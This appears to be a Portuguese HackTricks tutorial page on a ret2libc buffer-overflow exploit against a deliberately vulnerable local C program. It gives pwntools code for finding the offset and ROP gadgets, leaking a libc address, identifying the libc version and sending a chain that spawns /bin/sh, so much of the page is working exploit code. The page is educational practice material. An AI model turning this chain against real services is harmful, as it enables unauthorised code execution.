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<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
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# Resumo Rápido
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1. **Encontre** o **deslocamento de overflow**
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2. **Encontre** os gadgets `POP_RDI`, `PUTS_PLT` e `MAIN_PLT`
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3. Use os gadgets anteriores para **vazar o endereço de memória** de puts ou outra função libc e **encontre a versão da libc** ([baixe-a](https://libc.blukat.me))
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4. Com a biblioteca, **calcule o ROP e explore-o**
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# Outros tutoriais e binários para praticar
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Este tutorial vai explorar o código/binário proposto neste tutorial: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\
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Outros tutoriais úteis: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html)
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# Código
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Nome do arquivo: `vuln.c`
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```c
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#include <stdio.h>
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int main() {
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char buffer[32];
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puts("Simple ROP.\n");
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gets(buffer);
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return 0;
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}
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```
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```bash
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gcc -o vuln vuln.c -fno-stack-protector -no-pie
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```
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# ROP - Modelo de vazamento de LIBC
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Vou usar o código localizado aqui para criar o exploit.\
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Baixe o exploit e coloque-o no mesmo diretório do binário vulnerável e forneça os dados necessários ao script:
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{% content-ref url="rop-leaking-libc-template.md" %}
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[rop-leaking-libc-template.md](rop-leaking-libc-template.md)
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{% endcontent-ref %}
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# 1- Encontrando o deslocamento
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O modelo precisa de um deslocamento antes de continuar com o exploit. Se nenhum for fornecido, ele executará o código necessário para encontrá-lo (por padrão `OFFSET = ""`):
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```bash
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###################
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### Find offset ###
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###################
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OFFSET = ""#"A"*72
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if OFFSET == "":
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gdb.attach(p.pid, "c") #Attach and continue
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payload = cyclic(1000)
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print(r.clean())
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r.sendline(payload)
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#x/wx $rsp -- Search for bytes that crashed the application
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#cyclic_find(0x6161616b) # Find the offset of those bytes
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return
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```
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**Execute** `python template.py` uma consola GDB será aberta com o programa a falhar. Dentro dessa **consola GDB** execute `x/wx $rsp` para obter os **bytes** que iriam sobrescrever o RIP. Por fim, obtenha o **offset** usando uma consola **python**:
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```python
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from pwn import *
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cyclic_find(0x6161616b)
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```
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![](<../../../.gitbook/assets/image (140).png>)
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Depois de encontrar o deslocamento (neste caso 40), altere a variável OFFSET dentro do modelo usando esse valor.\
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`OFFSET = "A" * 40`
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Outra maneira seria usar: `pattern create 1000` -- _execute until ret_ -- `pattern seach $rsp` do GEF.
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# 2- Encontrando Gadgets
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Agora precisamos encontrar gadgets ROP dentro do binário. Esses gadgets ROP serão úteis para chamar `puts` para encontrar a **libc** sendo usada e, posteriormente, **lançar o exploit final**.
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```python
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PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
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MAIN_PLT = elf.symbols['main']
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POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
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RET = (rop.find_gadget(['ret']))[0]
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log.info("Main start: " + hex(MAIN_PLT))
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log.info("Puts plt: " + hex(PUTS_PLT))
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log.info("pop rdi; ret gadget: " + hex(POP_RDI))
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```
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O `PUTS_PLT` é necessário para chamar a **função puts**.\
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O `MAIN_PLT` é necessário para chamar a **função principal** novamente após uma interação para **explorar** o **estouro** **novamente** (rodadas infinitas de exploração). **É usado no final de cada ROP para chamar o programa novamente**.\
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O **POP\_RDI** é necessário para **passar** um **parâmetro** para a função chamada.
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Nesta etapa, você não precisa executar nada, pois tudo será encontrado pelo pwntools durante a execução.
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# 3- Encontrando a biblioteca LIBC
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Agora é hora de descobrir qual versão da biblioteca **libc** está sendo usada. Para fazer isso, vamos **vazar** o **endereço** na memória da **função** `puts` e então vamos **procurar** em qual **versão da biblioteca** a versão do puts está nesse endereço.
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```python
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def get_addr(func_name):
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FUNC_GOT = elf.got[func_name]
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log.info(func_name + " GOT @ " + hex(FUNC_GOT))
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# Create rop chain
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rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
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#Send our rop-chain payload
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#p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment
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print(p.clean()) # clean socket buffer (read all and print)
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p.sendline(rop1)
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#Parse leaked address
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recieved = p.recvline().strip()
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leak = u64(recieved.ljust(8, "\x00"))
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log.info("Leaked libc address, "+func_name+": "+ hex(leak))
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#If not libc yet, stop here
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if libc != "":
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libc.address = leak - libc.symbols[func_name] #Save libc base
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log.info("libc base @ %s" % hex(libc.address))
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return hex(leak)
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get_addr("puts") #Search for puts address in memmory to obtains libc base
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if libc == "":
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print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
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p.interactive()
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```
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Para fazer isso, a linha mais importante do código executado é:
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```python
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rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
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```
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Isso enviará alguns bytes até **sobrescrever** o **RIP** ser possível: `OFFSET`.\
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Em seguida, definirá o **endereço** do gadget `POP_RDI` para que o próximo endereço (`FUNC_GOT`) seja salvo no registro **RDI**. Isso ocorre porque queremos **chamar puts** **passando** o **endereço** do `PUTS_GOT` como o endereço na memória da função puts é salvo no endereço apontado por `PUTS_GOT`.\
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Depois disso, `PUTS_PLT` será chamado (com `PUTS_GOT` dentro do **RDI**) para que puts **leia o conteúdo** dentro de `PUTS_GOT` (**o endereço da função puts na memória**) e o **imprima**.\
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Por fim, a **função principal é chamada novamente** para que possamos explorar o estouro novamente.
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Dessa forma, enganamos a função puts para **imprimir** o **endereço** na **memória** da função **puts** (que está dentro da biblioteca **libc**). Agora que temos esse endereço, podemos **verificar qual versão do libc está sendo usada**.
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![](<../../../.gitbook/assets/image (141).png>)
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Como estamos **explorando** um **binário local**, **não é necessário** descobrir qual versão do **libc** está sendo usada (apenas encontre a biblioteca em `/lib/x86_64-linux-gnu/libc.so.6`).\
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Mas, em um caso de exploração remota, explicarei aqui como você pode encontrá-lo:
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## 3.1- Procurando pela versão do libc (1)
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Você pode procurar qual biblioteca está sendo usada na página da web: [https://libc.blukat.me/](https://libc.blukat.me)\
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Isso também permitirá que você baixe a versão descoberta do **libc**
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![](<../../../.gitbook/assets/image (142).png>)
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## 3.2- Procurando pela versão do libc (2)
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Você também pode fazer:
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* `$ git clone https://github.com/niklasb/libc-database.git`
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* `$ cd libc-database`
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* `$ ./get`
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Isso levará algum tempo, seja paciente.\
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Para isso funcionar, precisamos de:
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* Nome do símbolo do libc: `puts`
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* Endereço do libc vazado: `0x7ff629878690`
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Podemos descobrir qual **libc** está sendo usada.
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```
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./find puts 0x7ff629878690
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|
ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
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archive-glibc (id libc6_2.23-0ubuntu11_amd64)
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```
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Obtemos 2 correspondências (deve tentar a segunda se a primeira não funcionar). Baixe a primeira:
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```
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./download libc6_2.23-0ubuntu10_amd64
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Getting libc6_2.23-0ubuntu10_amd64
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-> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb
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-> Downloading package
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-> Extracting package
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-> Package saved to libs/libc6_2.23-0ubuntu10_amd64
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```
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Copie a libc de `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` para o nosso diretório de trabalho.
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## 3.3- Outras funções para vazamento
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```python
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puts
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printf
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__libc_start_main
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read
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gets
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```
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# 4- Encontrando o endereço base da libc e explorando
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Neste ponto, devemos saber qual biblioteca libc está sendo usada. Como estamos explorando um binário local, vou usar apenas: `/lib/x86_64-linux-gnu/libc.so.6`
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Portanto, no início do arquivo `template.py`, altere a variável **libc** para: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Defina o caminho da biblioteca quando souber`
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Ao fornecer o **caminho** para a **biblioteca libc**, o restante da **exploração será calculado automaticamente**.
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Dentro da função `get_addr`, o **endereço base da libc** será calculado:
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```python
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if libc != "":
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|
libc.address = leak - libc.symbols[func_name] #Save libc base
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|
log.info("libc base @ %s" % hex(libc.address))
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```
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{% hint style="info" %}
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Note que o **endereço base final da libc deve terminar em 00**. Se esse não for o seu caso, você pode ter vazado uma biblioteca incorreta.
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{% endhint %}
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Em seguida, o endereço da função `system` e o **endereço** da string _"/bin/sh"_ serão **calculados** a partir do **endereço base** da **libc** e considerando a **biblioteca libc** fornecida.
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```python
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BINSH = next(libc.search("/bin/sh")) - 64 #Verify with find /bin/sh
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SYSTEM = libc.sym["system"]
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EXIT = libc.sym["exit"]
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log.info("bin/sh %s " % hex(BINSH))
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log.info("system %s " % hex(SYSTEM))
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```
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Finalmente, o exploit de execução /bin/sh está prestes a ser preparado para ser enviado:
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```python
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rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
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p.clean()
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p.sendline(rop2)
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#### Interact with the shell #####
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p.interactive() #Interact with the conenction
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```
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Vamos explicar este ROP final.\
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O último ROP (`rop1`) terminou chamando novamente a função principal, então podemos **explorar novamente** o **overflow** (por isso o `OFFSET` está aqui novamente). Em seguida, queremos chamar `POP_RDI` apontando para o **endereço** de _"/bin/sh"_ (`BINSH`) e chamar a função **system** (`SYSTEM`) porque o endereço de _"/bin/sh"_ será passado como parâmetro.\
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Por fim, o **endereço da função exit** é **chamado** para que o processo **saia corretamente** e nenhum alerta seja gerado.
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**Dessa forma, o exploit executará um shell **_**/bin/sh**_**.**
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![](<../../../.gitbook/assets/image (143).png>)
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# 4(2)- Usando ONE\_GADGET
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Você também poderia usar [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget) para obter um shell em vez de usar **system** e **"/bin/sh". ONE\_GADGET** encontrará dentro da biblioteca libc alguma maneira de obter um shell usando apenas um **endereço ROP**. \
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No entanto, normalmente existem algumas restrições, as mais comuns e fáceis de evitar são como `[rsp+0x30] == NULL`. Como você controla os valores dentro do **RSP**, basta enviar mais valores NULL para evitar a restrição.
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![](<../../../.gitbook/assets/image (615).png>)
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|
```python
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|
ONE_GADGET = libc.address + 0x4526a
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rop2 = base + p64(ONE_GADGET) + "\x00"*100
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```
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# FICHEIRO DE EXPLOIT
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Pode encontrar um modelo para explorar esta vulnerabilidade aqui:
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{% content-ref url="rop-leaking-libc-template.md" %}
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|
[rop-leaking-libc-template.md](rop-leaking-libc-template.md)
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|
{% endcontent-ref %}
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# Problemas Comuns
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## MAIN\_PLT = elf.symbols\['main'] não encontrado
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Se o símbolo "main" não existir. Então você pode apenas onde está o código principal:
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```python
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objdump -d vuln_binary | grep "\.text"
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Disassembly of section .text:
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0000000000401080 <.text>:
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```
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e defina o endereço manualmente:
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```python
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|
MAIN_PLT = 0x401080
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```
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## Puts não encontrado
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Se o binário não estiver usando Puts, você deve verificar se está usando
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## `sh: 1: %s%s%s%s%s%s%s%s: not found`
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Se encontrar este **erro** após criar **todo** o exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
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Tente **subtrair 64 bytes do endereço de "/bin/sh"**:
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|
```python
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BINSH = next(libc.search("/bin/sh")) - 64
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```
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